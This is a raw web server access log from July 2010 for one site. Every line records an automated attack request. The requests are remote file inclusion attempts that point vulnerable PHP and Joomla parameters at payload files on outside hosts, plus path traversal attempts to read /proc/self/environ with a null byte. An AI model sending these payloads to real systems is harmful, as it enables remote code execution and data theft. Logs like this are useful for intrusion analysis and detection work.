66.191.139.210 - - [02/Jul/2010:00:49:30 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
66.191.139.210 - - [02/Jul/2010:00:49:34 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
66.191.139.210 - - [02/Jul/2010:00:49:34 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
66.191.139.210 - - [02/Jul/2010:00:49:34 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
66.191.139.210 - - [02/Jul/2010:00:51:39 -0700] "GET /logs/access_100601.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
66.191.139.210 - - [02/Jul/2010:00:51:41 -0700] "GET /logs/access_100601.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
61.135.134.108 - - [02/Jul/2010:00:52:25 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://kanalkultur.com/de/language/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
61.135.134.108 - - [02/Jul/2010:00:52:26 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://kanalkultur.com/de/language/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
61.135.134.108 - - [02/Jul/2010:00:52:26 -0700] "GET /logs/access_100531.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://kanalkultur.com/de/language/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
61.135.134.108 - - [02/Jul/2010:00:52:36 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://kanalkultur.com/de/language/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
61.135.134.108 - - [02/Jul/2010:00:52:36 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://kanalkultur.com/de/language/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
61.135.134.108 - - [02/Jul/2010:00:52:43 -0700] "GET /logs/access_100531.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://kanalkultur.com/de/language/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
91.121.67.226 - - [02/Jul/2010:00:53:12 -0700] "GET /logs/access_100331.log//index.php?option=com_remository&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.de-construction.com"
91.121.67.226 - - [02/Jul/2010:00:53:12 -0700] "GET /index.php?option=com_remository&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.de-construction.com"
91.121.67.226 - - [02/Jul/2010:00:53:13 -0700] "GET /logs//index.php?option=com_remository&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.de-construction.com"
83.16.100.218 - - [02/Jul/2010:00:55:52 -0700] "GET /logs/access.log/?phpbb_root_path=http://www.amde.org.br/joomla/images/stories/fruit/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
83.16.100.218 - - [02/Jul/2010:00:55:52 -0700] "GET /?phpbb_root_path=http://www.amde.org.br/joomla/images/stories/fruit/a?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.de-construction.com"
83.16.100.218 - - [02/Jul/2010:00:55:52 -0700] "GET /logs/?phpbb_root_path=http://www.amde.org.br/joomla/images/stories/fruit/a?? HTTP/1.1" 200 1367 "-" "Mozilla/5.0" "www.de-construction.com"
64.151.192.11 - - [02/Jul/2010:01:07:53 -0700] "GET /logs/access_100531.log//components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
64.151.192.11 - - [02/Jul/2010:01:07:54 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
64.151.192.11 - - [02/Jul/2010:01:07:55 -0700] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
64.151.192.11 - - [02/Jul/2010:01:11:01 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
110.45.140.231 - - [02/Jul/2010:01:22:42 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
110.45.140.231 - - [02/Jul/2010:01:22:42 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
110.45.140.231 - - [02/Jul/2010:01:23:03 -0700] "GET /logs/access_100501.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
64.151.192.11 - - [02/Jul/2010:01:28:31 -0700] "GET /logs/access_100601.log//components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
64.151.192.11 - - [02/Jul/2010:01:28:31 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
64.151.192.11 - - [02/Jul/2010:01:28:32 -0700] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
203.252.71.232 - - [02/Jul/2010:01:28:47 -0700] "GET /logs/access_100601.log//index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
203.252.71.232 - - [02/Jul/2010:01:28:47 -0700] "GET /index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
203.252.71.232 - - [02/Jul/2010:01:28:48 -0700] "GET /logs//index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
203.252.71.232 - - [02/Jul/2010:01:30:02 -0700] "GET /index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
222.236.47.182 - - [02/Jul/2010:01:37:46 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
222.236.47.182 - - [02/Jul/2010:01:37:46 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
222.236.47.182 - - [02/Jul/2010:01:37:46 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
85.88.3.65 - - [02/Jul/2010:01:54:30 -0700] "GET /logs/access_100601.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://royalbio.net/docs/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
85.88.3.65 - - [02/Jul/2010:01:54:30 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://royalbio.net/docs/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
85.88.3.65 - - [02/Jul/2010:01:54:30 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://royalbio.net/docs/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
85.88.3.65 - - [02/Jul/2010:01:54:37 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://royalbio.net/docs/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
85.88.3.65 - - [02/Jul/2010:01:54:37 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://royalbio.net/docs/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
85.88.3.65 - - [02/Jul/2010:01:54:37 -0700] "GET /logs/access_100601.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://royalbio.net/docs/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
89.108.64.192 - - [02/Jul/2010:01:55:58 -0700] "GET /write_update.php?board_skin_path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.de-construction.com"
195.190.166.29 - - [02/Jul/2010:02:00:02 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.dong69.co.kr/xe/1.pdf???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
195.190.166.29 - - [02/Jul/2010:02:00:02 -0700] "GET /logs/access_100601.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.dong69.co.kr/xe/1.pdf???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
195.190.166.29 - - [02/Jul/2010:02:00:02 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.dong69.co.kr/xe/1.pdf???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
195.190.166.29 - - [02/Jul/2010:02:00:07 -0700] "GET /logs/access_100601.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.dong69.co.kr/xe/1.pdf???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
195.190.166.29 - - [02/Jul/2010:02:00:07 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.dong69.co.kr/xe/1.pdf???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
195.190.166.29 - - [02/Jul/2010:02:00:08 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.dong69.co.kr/xe/1.pdf???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
211.63.250.191 - - [02/Jul/2010:02:01:22 -0700] "GET /logs/access_100601.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.freediskspace.com/_inc/images/v4.5id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
211.63.250.191 - - [02/Jul/2010:02:01:22 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.freediskspace.com/_inc/images/v4.5id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
211.63.250.191 - - [02/Jul/2010:02:01:23 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.freediskspace.com/_inc/images/v4.5id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
222.236.47.182 - - [02/Jul/2010:02:03:18 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
222.236.47.182 - - [02/Jul/2010:02:03:19 -0700] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
222.236.47.182 - - [02/Jul/2010:02:03:19 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
222.236.47.182 - - [02/Jul/2010:02:03:27 -0700] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
62.182.63.49 - - [02/Jul/2010:02:03:27 -0700] "GET /logs//index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
62.182.63.49 - - [02/Jul/2010:02:03:28 -0700] "GET /index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
222.236.47.182 - - [02/Jul/2010:02:03:28 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
222.236.47.182 - - [02/Jul/2010:02:03:28 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
72.52.150.147 - - [02/Jul/2010:02:09:14 -0700] "GET /logs/access_100601.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://yourbestdate.info/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
72.52.150.147 - - [02/Jul/2010:02:09:14 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://yourbestdate.info/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
72.52.150.147 - - [02/Jul/2010:02:09:15 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://yourbestdate.info/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
72.52.150.147 - - [02/Jul/2010:02:09:56 -0700] "GET /logs//setup.php?dir=http://yourbestdate.info/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
72.52.150.147 - - [02/Jul/2010:02:09:56 -0700] "GET /setup.php?dir=http://yourbestdate.info/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
92.241.190.214 - - [02/Jul/2010:02:13:40 -0700] "GET /logs//setup.php?dir=http://www.dbac.ac.th/smf115/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
72.52.150.147 - - [02/Jul/2010:02:15:53 -0700] "GET /logs//setup.php?dir=http://yourbestdate.info/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
72.52.150.147 - - [02/Jul/2010:02:15:53 -0700] "GET /setup.php?dir=http://yourbestdate.info/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
85.19.150.100 - - [02/Jul/2010:02:17:30 -0700] "GET /logs//index.php?option=com_remository&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.de-construction.com"
85.19.150.100 - - [02/Jul/2010:02:17:30 -0700] "GET /index.php?option=com_remository&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.de-construction.com"
85.19.150.100 - - [02/Jul/2010:02:17:58 -0700] "GET /logs//index.php?option=com_remository&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.de-construction.com"
85.19.150.100 - - [02/Jul/2010:02:17:58 -0700] "GET /index.php?option=com_remository&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.de-construction.com"
92.241.190.214 - - [02/Jul/2010:02:20:37 -0700] "GET /logs//setup.php?dir=http://www.dbac.ac.th/smf115/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
92.241.190.214 - - [02/Jul/2010:02:20:38 -0700] "GET /setup.php?dir=http://www.dbac.ac.th/smf115/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
92.60.176.46 - - [02/Jul/2010:02:27:48 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://osungelec.co.kr/board//data/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
92.60.176.46 - - [02/Jul/2010:02:27:48 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://osungelec.co.kr/board//data/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
92.60.176.46 - - [02/Jul/2010:02:27:48 -0700] "GET /logs/access_100601.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://osungelec.co.kr/board//data/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
92.60.176.46 - - [02/Jul/2010:02:27:48 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://osungelec.co.kr/board//data/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
92.60.176.46 - - [02/Jul/2010:02:27:48 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://osungelec.co.kr/board//data/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.251.80.167 - - [02/Jul/2010:02:30:30 -0700] "GET /logs//index.php?option=com_mgm&&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
203.251.80.167 - - [02/Jul/2010:02:30:30 -0700] "GET /index.php?option=com_mgm&&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
92.60.176.46 - - [02/Jul/2010:02:34:27 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://osungelec.co.kr/board//data/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
85.19.150.100 - - [02/Jul/2010:02:34:31 -0700] "GET /logs//index.php?option=com_remository&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.de-construction.com"
85.19.150.100 - - [02/Jul/2010:02:34:32 -0700] "GET /index.php?option=com_remository&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.de-construction.com"
85.19.150.100 - - [02/Jul/2010:02:34:32 -0700] "GET /logs//index.php?option=com_remository&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.de-construction.com"
85.19.150.100 - - [02/Jul/2010:02:34:33 -0700] "GET /index.php?option=com_remository&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.de-construction.com"
91.191.173.120 - - [02/Jul/2010:02:35:41 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
91.191.173.120 - - [02/Jul/2010:02:35:41 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
91.191.173.120 - - [02/Jul/2010:02:35:41 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.251.80.167 - - [02/Jul/2010:02:39:25 -0700] "GET /logs/access_100531.log//index.php?option=com_mgm&&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
203.251.80.167 - - [02/Jul/2010:02:39:26 -0700] "GET /index.php?option=com_mgm&&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
203.251.80.167 - - [02/Jul/2010:02:39:26 -0700] "GET /logs//index.php?option=com_mgm&&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
92.60.176.46 - - [02/Jul/2010:02:40:33 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://osungelec.co.kr/board//data/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
92.60.176.46 - - [02/Jul/2010:02:40:33 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://osungelec.co.kr/board//data/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
92.60.176.46 - - [02/Jul/2010:02:40:33 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://osungelec.co.kr/board//data/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
